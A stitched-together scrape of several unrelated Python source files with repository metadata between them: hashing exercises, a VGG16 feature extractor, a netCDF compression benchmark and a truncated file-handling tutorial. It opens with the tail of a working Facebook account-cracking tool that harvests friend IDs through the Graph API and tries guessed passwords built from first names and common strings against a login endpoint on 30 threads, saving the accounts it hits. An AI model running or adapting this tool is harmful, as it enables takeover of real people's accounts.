print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Crack From Friend List"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;93m Crack From Any Public ID"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m]\x1b[1;93m Crack From File"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Back"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mGetting ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mEnter ID \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mName\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mID Not Found!"
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mGetting IDs \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mEnter File Path \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile Not Found'
raw_input('\n\x1b[1;96m[ \x1b[1;97mBack \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal IDs \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;96m[✺] \033[1;93mStarting \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCracking \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mTo Stop Process Press CTRL Then Press z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = ('786786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = b['first_name'] + '12'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['first_name'] + '1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name'] + '1122'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mProcess Has Been Completed \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File Has Been Saved \033[1;91m: \033[1;97mout/checkpoint.txt")
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
menu()
if __name__ == '__main__':
login()
|
[
"noreply@github.com"
] |
aftabgit786.noreply@github.com
|
369d48ff237aaa397d17503fcbc6269012a892a0
|
69c27255a714c406cdb2f673b5f78bcdfc56e668
|
/vezba07/z2.py
|
2c94ae248d91a401cb3f3478038f7200125fcd39
|
[] |
no_license
|
stefan9x/pa
|
fcb1f59043a8d2710978c5393f18cde5c418de25
|
6123502f5629375723cf6eda4a9eb93e27ff0659
|
refs/heads/master
| 2020-04-25T05:18:05.547692
| 2019-06-14T20:24:57
| 2019-06-14T20:24:57
| 172,537,624
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,408
|
py
|
import math
import random
import time
class Data:
def __init__(self, key):
self.key = key
self.literal = str(key)
def __str__(self):
return str(self.key)
def randList(min, max, num):
l = []
for i in range(num):
rand = random.randint(min, max)
l.append(rand)
return l
def h1(k, m):
return k.key % m
def h2(k, m):
return 1 + (k.key % (m - 1))
def linProb(k, m, i):
return (h1(k, m) + i) % m
def quadProb(k, m, i):
    c1 = c2 = 1 / 2
    # the quadratic offset can be fractional, so cast to int before the result is used as a table index
    return int(h1(k, m) + c1 * i + c2 * i * i) % m
def doubleHash(k, m):
    # note: a full double-hashing probe sequence would also use the attempt number i, e.g. (h1 + i * h2) % m
    return (h1(k, m) + h2(k, m)) % m
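# Probe-sequence example (illustrative): with m = 7 and a key whose h1 value is 3,
# linear probing visits slots 3, 4, 5, 6, 0, 1, 2 as i runs from 0 to m - 1.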
def hashInsert(T, k, m):
i = 0
while(i != m):
j = linProb(k, m, i)
if T[j] == None or T[j] == "deleted":
T[j] = k
return j
else:
i += 1
return -1
def hashSearch(T, k, m):
    i = 0
    while True:
        j = linProb(k, m, i)
        if T[j] is None:
            # an empty slot means the key was never inserted
            return None
        if T[j] != "deleted" and T[j].key == k.key:
            return j
        i += 1
        if i == m:
            return None
# Additional task
def hashDelete(T, k, m):
    j = hashSearch(T, k, m)
    if j is not None:
        T[j] = "deleted"
if __name__ == "__main__":
for n in [10000, 50000, 100000]:
L = randList(0, n*2, n)
for m in [n, n//2, n//4]:
T = [None] * m
startTime = time.perf_counter()
print("\n")
for l in L:
k = Data(l)
res = hashInsert(T, k, m)
if res == -1:
print("Hash overflow")
break
endTime = time.perf_counter() - startTime
print("Time for table form(n=%d, m=%d):" %(n, m), endTime)
r = random.randint(0, n)
src = Data(L[r])
print("Searching for %d" %(src.key))
startTime = time.perf_counter()
src_res = hashSearch(T, src, m)
endTime = time.perf_counter() - startTime
if src_res != None:
print("Found! Took:", endTime)
else:
print("Not Found! Took:", endTime)
#delete testing
'''for t in T:
print(t)
hashDelete(T, src, m)
for t in T:
print(t)'''
|
[
"stefanj94@live.com"
] |
stefanj94@live.com
|
2ccb1c92186cd0395ec86eeae1b6090e27711a20
|
4e8b2ea63c201ff50f6ce76eeb3649e5e1dd68f3
|
/src/00_hello.py
|
f4da22fb5b904db9f339fb8006780670a67d5971
|
[] |
no_license
|
DanielFirpo/Intro-Python-I
|
badd427560f32d6f9acc68b339880776b5e27dfb
|
6c03efcb8d0048c4feb6ef54ffb2b5b3e6f6abf3
|
refs/heads/master
| 2022-04-01T16:00:31.202434
| 2020-02-11T23:11:46
| 2020-02-11T23:11:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 63
|
py
|
# Print "Hello, world!" to your terminal
print("Hello, world.")
|
[
"trtld2@gmail.com"
] |
trtld2@gmail.com
|
d22118d55882db65321d3e871bffec9d45a6b351
|
6dd2987e853fd59f7db8f2ce9c7c012510038e85
|
/src/eumetsat/tools/compression/osi_saf_netcdf_round_floats.py
|
9ce63a8f0b11b8825a38a88daeae051258cce7b8
|
[] |
no_license
|
JoaoGRRodrigues/rodd
|
2980c62cd40362d2df9ad41bdda5b72d7b6d9002
|
235fd68d62923dfe514db182e1c4ccf7a72af5f5
|
refs/heads/master
| 2021-05-31T17:03:29.372364
| 2016-04-26T08:11:38
| 2016-04-26T08:11:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,323
|
py
|
'''
Created on Dec 2, 2010
@author: gaubert
'''
from netCDF4 import Dataset
import numpy
import subprocess
import sys
import fileinput
import tempfile
import os
import csv
import eumetsat.common.utils
from eumetsat.common.utils import ftimer
import ftplib
SERVER = 'podaac.jpl.nasa.gov'
DIRECTORY = '/GHRSST2/data/L2P/AVHRR_METOP_A/EUR/2010/340'
FILES = '*.bz2'
def list_ftp_dir(server, dir, files):
""" return a list of files from a ftp dir """
print("== list %s on %s\n" % (dir, server))
ftp = ftplib.FTP(server)
ftp.login()
ftp.cwd(dir)
res = ftp.nlst(files)
return res
def download_file(server, dir, in_file, out_filename):
""" download a file """
print("== Get file %s in %s\n" % (in_file, out_filename))
ftp = ftplib.FTP(server)
ftp.login()
ftp.cwd(dir)
result_file = open(out_filename,"wb")
ftp.retrbinary('RETR %s' %(in_file) , result_file.write)
result_file.close()
print("== End of Get file %s\n" % (in_file))
def generate_template_from_src(a_working_dir, a_input, a_output, a_nc_ver):
""" generate cdl for original nc file and modify the lat lon type to be in the new type """
create_cdl_script = "/homespace/gaubert/ecli-workspace/rodd/etc/compression/create_cdl.sh"
print("== Create cdl %s/temp.cdl\n" %(a_working_dir))
cdl_file = "%s/temp.cdl" % (a_working_dir)
res = subprocess.call([create_cdl_script, a_input, cdl_file])
if res != 0:
print("Error: Problem while creating cdl %s file from %s" % (cdl_file, a_input))
print("== Generate new nc file %s/%s\n" % (a_working_dir,a_output) )
#now create the nc file
create_nc_script = "/homespace/gaubert/ecli-workspace/rodd/etc/compression/generate_nc_file.sh"
res = subprocess.call([create_nc_script, cdl_file, "%s/%s" % (a_working_dir,a_output), str(a_nc_ver) ])
if res != 0:
print("Error: Problem while creating nc %s file from %s" % (create_nc_script))
return "%s/%s" % (a_working_dir,a_output)
def transform_osi_saf_netcdf(input_file, new_data_set, digits, debug = False):
""" Transform osi saf int netcdf """
print("================== Start transforming netCDF coordinates (precision %s) ==================" % (digits) )
old_dataset = Dataset(input_file,'a')
new_dataset = Dataset(new_data_set,'a')
o_lat = old_dataset.variables['lat']
o_lon = old_dataset.variables['lon']
o_lat_data = o_lat[:]
o_lon_data = o_lon[:]
# get dimensions from the old dataset
nj_max = len(old_dataset.dimensions['nj'])
ni_max = len(old_dataset.dimensions['ni'])
#need to create a numpy array with the right dimensions and fill it with the scale lat values
# and then the lon values
#n_data = numpy.zeros((nj_max, ni_max), dtype=int)
n_data = numpy.zeros((nj_max, ni_max), dtype=float)
nj = 0
ni = 0
print("== Start lat transformation \n")
while nj < nj_max:
while ni < ni_max:
#n_data[nj][ni] = round(o_lat_data[nj][ni], digits)*pow(10,digits)
n_data[nj][ni] = round(o_lat_data[nj][ni], digits)
ni += 1
if debug and (nj % 10) == 0:
print("debug: In nj loop %d\n" % (nj))
ni = 0
nj += 1
print("== End of lat transformation \n")
new_dataset.variables['lat'][:] = n_data
new_dataset.sync()
print("== Start lon transformation \n")
#n_data = numpy.zeros((nj_max, ni_max), dtype=int)
n_data = numpy.zeros((nj_max, ni_max), dtype=float)
#reset ni nj
ni = 0
nj = 0
while nj < nj_max:
while ni < ni_max:
#n_data[nj][ni] = round(o_lon_data[nj][ni], digits)*pow(10,digits)
n_data[nj][ni] = round(o_lon_data[nj][ni], digits)
ni += 1
if debug and (nj % 10) == 0:
print("debug: In nj loop %d\n" % (nj))
ni = 0
nj += 1
print("== End of lon transformation \n")
new_dataset.variables['lon'][:] = n_data
new_dataset.sync()
new_dataset.close()
old_dataset.sync()
old_dataset.close()
print("================== End of transforming netCDF coordinates ==================")
def compress_original_files(original_filename):
""" compress the output file and gets its compressed size """
print("== Compress original file %s \n" %(original_filename))
new_data_set = original_filename
# get data_set uncompressed size
size = os.path.getsize(new_data_set)
sevenzip_script = "/homespace/gaubert/ecli-workspace/rodd/etc/compression/7zip_compression.sh"
func = subprocess.call
res = [ ]
time_7zip = ftimer(func,[ [ sevenzip_script, new_data_set, "%s.7z" % (new_data_set) ] ], {}, res,number=1)
print("\nTime: %s secs \n 7zip file %s\n"%(time_7zip , new_data_set))
if res[0] != 0:
print("Error. Cannot 7zip file %s" % (new_data_set))
size_7zip = os.path.getsize("%s.7z" %(new_data_set))
"""bzip2_script = "/homespace/gaubert/ecli-workspace/rodd/etc/compression/bzip2_compression.sh"
func = subprocess.call
res = []
time_bzip2 = ftimer(func,[[bzip2_script, new_data_set, "%s.bz2" % (new_data_set) ] ], {}, res, number=1)
print("\nTime: %s secs \n bzip2 file %s\n"%(time_bzip2 , new_data_set))
if res[0] != 0:
print("Error. Cannot bzip2 file %s" % (new_data_set))
size_bzip2 = os.path.getsize("%s.bz2" %(new_data_set))
"""
szip_script = "/homespace/gaubert/ecli-workspace/rodd/etc/compression/szip_compression.sh"
time_szip = ftimer(func,[ [ szip_script, new_data_set, "%s.sz" % (new_data_set) ] ], {}, res,number=1)
print("\nTime: %s secs \n szip file %s\n" % (time_szip , new_data_set))
if res[0] != 0:
print("Error. Cannot bzip2 file %s" % (new_data_set))
size_szip = os.path.getsize("%s.sz" %(new_data_set))
print("7zip size %d. szip size %d" % (size_7zip, size_szip))
#return [( round(float(size)/float(size_bzip2), 2), size_bzip2, time_bzip2 ),( round(float(size)/float(size_szip), 2), size_szip, time_szip )]
return {
'name' : os.path.basename(original_filename),
'size' : size,
'orig 7z size' : size_7zip,
'orig 7z ratio': round(float(size)/float(size_7zip), 2),
'orig 7z compression time' : round(time_7zip,2),
'orig sz size' : size_szip,
'orig sz ratio' : round(float(size)/float(size_szip), 2),
'orig sz compression time' : round(time_szip,2)
}
def compress_files(original_filename, new_data_set, digits):
""" compress the output file and gets its compressed size """
print("== Start Compression tests for %s \n" %(new_data_set))
# get data_set uncompressed size
size = os.path.getsize(new_data_set)
bzip2_script = "/homespace/gaubert/ecli-workspace/rodd/etc/compression/bzip2_compression.sh"
func = subprocess.call
res = []
sevenzip_script = "/homespace/gaubert/ecli-workspace/rodd/etc/compression/7zip_compression.sh"
func = subprocess.call
res = []
time_7zip = ftimer(func,[ [sevenzip_script, new_data_set, "%s.7z" % (new_data_set) ] ], {}, res, number=1)
print("\nTime: %s secs \n 7zip file %s\n"%(time_7zip , new_data_set))
if res[0] != 0:
print("Error. Cannot 7zip file %s" % (new_data_set))
size_7zip = os.path.getsize("%s.7z" %(new_data_set))
"""
time_bzip2 = ftimer(func,[[bzip2_script, new_data_set, "%s.bz2" % (new_data_set) ] ], {}, res, number=1)
print("\nTime: %s secs \n bzip2 file %s\n"%(time_bzip2 , new_data_set))
if res[0] != 0:
print("Error. Cannot bzip2 file %s" % (new_data_set))
size_bzip2 = os.path.getsize("%s.bz2" %(new_data_set))
"""
szip_script = "/homespace/gaubert/ecli-workspace/rodd/etc/compression/szip_compression.sh"
time_szip = ftimer(func,[ [ szip_script, new_data_set, "%s.sz" % (new_data_set) ] ], {}, res,number=1)
print("\nTime: %s secs \n szip file %s\n" % (time_szip , new_data_set))
if res[0] != 0:
print("Error. Cannot bzip2 file %s" % (new_data_set))
size_szip = os.path.getsize("%s.sz" %(new_data_set))
print("7zip size %d. szip size %d" % (size_7zip, size_szip))
#return [( round(float(size)/float(size_bzip2), 2), size_bzip2, time_bzip2 ),( round(float(size)/float(size_szip), 2), size_szip, time_szip )]
return {
'name' : os.path.basename(original_filename),
'size' : size,
'%d d 7z size' % (digits) : size_7zip,
'%d d 7z ratio' % (digits): round(float(size)/float(size_7zip), 2),
'%d d 7z compression time' % (digits) : round(time_7zip,2),
#'%d d bz2 size' % (digits) : size_bzip2,
#'%d d bz2 ratio' % (digits) : round(float(size)/float(size_bzip2), 2),
#'%d d bz2 compression time' % (digits) : round(time_bzip2,2),
'%d d sz size' % (digits) : size_szip,
'%d d sz ratio' % (digits) : round(float(size)/float(size_szip), 2),
'%d d sz compression time' % (digits): round(time_szip,2)
}
def run_unitary_test(filename, temp_root_dir, to_clean, version, transform = True):
""" run 2 digits and 3 digits precisons test for each files """
bunzip2_script = "/homespace/gaubert/ecli-workspace/rodd/etc/compression/bunzip2.sh"
tempdir = tempfile.mkdtemp(dir=temp_root_dir)
output_download_file = '%s/%s' % (tempdir, filename)
download_file(SERVER, DIRECTORY, filename, output_download_file)
if output_download_file.endswith('.bz2'):
res = subprocess.call([bunzip2_script, output_download_file])
if res != 0:
raise Exception("Error while uncompressing %s\n" % (output_download_file) )
else:
output_download_file = output_download_file[:-4]
d1 = {}
d2 = {}
d3 = {}
d4 = {}
if transform:
output_file = generate_template_from_src(tempdir, output_download_file,'new-file.nc', version)
#test with 3 digits
digits = 3
transform_osi_saf_netcdf(output_download_file, output_file, digits)
d2 = compress_files(output_download_file, output_file, digits)
d4 = compress_original_files(output_download_file)
# clean temp dir
if to_clean:
eumetsat.common.utils.delete_all_under(tempdir, True)
return dict(d1.items() + d2.items() + d3.items() + d4.items())
def run_full_tests(version = 3, result_file_name = '/tmp/result-nc3.csv', nb_runs = 50, transform = True):
""" run the complete tests """
TO_CLEAN = False
#ROOT_TEMP_DIR = "/homespace/gaubert/tempo"
ROOT_TEMP_DIR = "/tmp/comp-tempo"
if TO_CLEAN:
#clean root dir
eumetsat.common.utils.delete_all_under(ROOT_TEMP_DIR)
#create csv file
digits = 3
fieldnames = ['%d d 7z size' % (digits) , '%d d 7z ratio' % (digits) , '%d d 7z compression time' % (digits) , '%d d sz size' % (digits) , '%d d sz ratio' % (digits) , '%d d sz compression time' % (digits)]
    # add fieldnames for the original (untransformed) files
    fieldnames.extend(['orig 7z size', 'orig 7z ratio', 'orig 7z compression time', 'orig sz size', 'orig sz ratio', 'orig sz compression time'])
    # add filename and initial size
    fieldnames.extend([ 'name', 'size' ])
result_file = open(result_file_name, 'wb')
writer = csv.DictWriter(result_file, fieldnames=fieldnames)
headers = dict( (n,n) for n in fieldnames )
writer.writerow(headers)
result_file.flush()
#result_file.close()
list_of_files = list_ftp_dir(SERVER, DIRECTORY, FILES)
icpt = 0
for (i,the_file) in enumerate(list_of_files):
print("####################### Run %d #######################\n" % (i))
try:
result_row = run_unitary_test(the_file, ROOT_TEMP_DIR, TO_CLEAN, version, transform)
# comment creation of results in csv file
print("result_row = %s\n" %(result_row))
writer.writerow(result_row)
result_file.flush()
icpt+=1
if icpt == nb_runs:
break
except Exception, e:
print(eumetsat.common.utils.get_exception_traceback())
if __name__ == '__main__':
version = 3
result_file_name = '/tmp/result-nc-round-3d-7z.csv'
nb_runs = 60
transform = True
run_full_tests(version, result_file_name, nb_runs, transform)
#version = 4
#result_file_name = '/tmp/result-nc4.csv'
#nb_runs = 50
#run_full_tests(version, result_file_name, nb_runs)
|
[
"guillaume.aubert@gmail.com"
] |
guillaume.aubert@gmail.com
|
e6b5006446aa5630b3cd4c2cb01fd78aa200d0ba
|
008ea2e16bc919465579210792d221e465d59660
|
/extract_features.py
|
21d10dad2f79acf63306c1f343ea9d477a0e9acd
|
[
"MIT"
] |
permissive
|
AdamSpannbauer/wedding_ring_detector
|
d0e1883b9c204a6cfbf439d3bf798cb7d45cfd02
|
eb59acbb70f513711657b6f1b04abbf2ca271319
|
refs/heads/master
| 2020-08-24T16:27:46.263977
| 2019-10-23T21:33:55
| 2019-10-23T21:33:55
| 216,863,821
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,921
|
py
|
"""Extract features from training images to hd5f db
Modified from:
https://gurus.pyimagesearch.com/topic/transfer-learning-example-dogs-and-cats/
"""
import cv2
import numpy as np
from keras.applications import VGG16
from keras.applications import imagenet_utils
class FeatureExtractor:
"""Wrapper to extract features from images with pre-trained VGG16
:param batch_size: number of images to extract features from at once
:ivar batch_size: see param batch_size
:ivar model: pre-trained VGG16 from keras.applications
"""
def __init__(self, batch_size=1):
self.model = VGG16(weights='imagenet', include_top=False)
self.batch_size = batch_size
@staticmethod
def preprocess_cv2_image(cv2_image_bgr):
"""Prepare an OpenCV BGR image for keras.applications.VGG16(weights='imagenet')
:param cv2_image_bgr: OpenCV style BGR image
:return: image with attributes prepared for keras VGG16 imagenet model
"""
cv2_image_bgr = cv2.resize(cv2_image_bgr, (224, 224))
cv2_image_rgb = cv2.cvtColor(cv2_image_bgr, cv2.COLOR_BGR2RGB).astype('float')
image_4d = np.expand_dims(cv2_image_rgb, axis=0)
preprocessed_image = imagenet_utils.preprocess_input(image_4d)
return preprocessed_image
def extract_features(self, images, batch_size=None):
"""Extract features from batch of prepped images
:param images: Array of images prepped for keras.applications.VGG16(weights='imagenet')
:param batch_size: Number of images to extract features from at once
:return: Array of features extracted by keras VGG16 imagenet model
"""
if batch_size is None:
batch_size = self.batch_size
features = self.model.predict(images, batch_size=batch_size)
return features.reshape((features.shape[0], 512 * 7 * 7))
def extract_features_cv2(self, cv2_image_bgr):
"""Extract VGG16 imagenet features from single OpenCV BGR image
:param cv2_image_bgr: OpenCV BGR image
:return: Array of features extracted by keras VGG16 imagenet model
"""
preprocessed_image = self.preprocess_cv2_image(cv2_image_bgr)
features = self.extract_features(preprocessed_image, batch_size=1)
return features.reshape((features.shape[0], 512 * 7 * 7))
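# Illustrative usage of the wrapper above (a sketch; 'ring.jpg' is a placeholder path):
#     extractor = FeatureExtractor(batch_size=1)
#     bgr_image = cv2.imread('ring.jpg')                 # OpenCV loads images in BGR order
#     feats = extractor.extract_features_cv2(bgr_image)  # array of shape (1, 512 * 7 * 7)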
if __name__ == '__main__':
import argparse
import random
import os
from tqdm import tqdm
import imutils.paths
from sklearn.preprocessing import LabelEncoder
from hdf5_dataset_writer import HDF5DatasetWriter
random.seed(42)
CLASS_LABELS = {
'gather_married': 'married',
'gather_non_married': 'not_married',
}
ap = argparse.ArgumentParser()
ap.add_argument('-d', '--dataset', default='images',
help='path to input dataset')
ap.add_argument('-o', '--output', default='features.hdf5',
help='path to output HDF5 file')
ap.add_argument('-b', '--batch_size', type=int, default=32,
help='batch size of images to be passed through network')
ap.add_argument('-s', '--buffer_size', type=int, default=1000,
help='size of feature extraction buffer')
args = vars(ap.parse_args())
all_image_paths = list(imutils.paths.list_images(args['dataset']))
random.shuffle(all_image_paths)
class_labels = []
image_paths = []
for image_path in tqdm(all_image_paths, desc='Filtering images'):
dir_label = image_path.split(os.path.sep)[-2]
try:
class_label = CLASS_LABELS[dir_label]
except KeyError:
continue
class_labels.append(class_label)
image_paths.append(image_path)
label_encoder = LabelEncoder()
labels = label_encoder.fit_transform(class_labels)
feature_extractor = FeatureExtractor(batch_size=args['batch_size'])
dataset = HDF5DatasetWriter((len(image_paths), 512 * 7 * 7),
args['output'],
data_key='features',
buff_size=args['buffer_size'],
overwrite=True)
dataset.store_class_labels(label_encoder.classes_)
for i in tqdm(range(0, len(image_paths), args['batch_size']), desc='Extracting features'):
batch_paths = image_paths[i:i + args['batch_size']]
batch_labels = labels[i:i + args['batch_size']]
batch_images = []
# Perform batch feature extraction and add to db
for (j, image_path) in enumerate(batch_paths):
image = cv2.imread(image_path)
image = feature_extractor.preprocess_cv2_image(image)
batch_images.append(image)
batch_images = np.vstack(batch_images)
feats = feature_extractor.extract_features(batch_images)
dataset.add(feats, batch_labels)
dataset.close()
|
[
"u775749@emn.com"
] |
u775749@emn.com
|
fbc4485b2e43f3282f9b7e102231bd0608f8f911
|
03ba3c552b9ea608cee992e834d2e2983a867e38
|
/programacion_desde_cero_con_python/manejo_archivos.py
|
0bbad88ffb784e98f80d97c7a37dc0ad96368f74
|
[] |
no_license
|
vpoloromero/Curso-Python
|
e7b387e9b6335f876502d9daf65ead482396f4bf
|
168d3b4d85a3da6ff1dc0d4f7da39a47866bd348
|
refs/heads/master
| 2022-09-12T13:40:46.895694
| 2022-07-27T22:12:47
| 2022-07-27T22:12:47
| 216,206,428
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 526
|
py
|
# -*- coding: utf-8 -*-
"""
@author: Octavio Gutiérrez de Código Máquina
Channel URL: https://www.youtube.com/CodigoMaquina
Video URL: https://youtu.be/bf_698bfPDU
"""
def escribir(nombre, texto):
    # Write the given text to the file, overwriting any previous contents.
    with open(nombre, "w") as archivo:
        archivo.write(texto)
def leer(nombre):
    # Read and return the full contents of the file.
    texto = ""
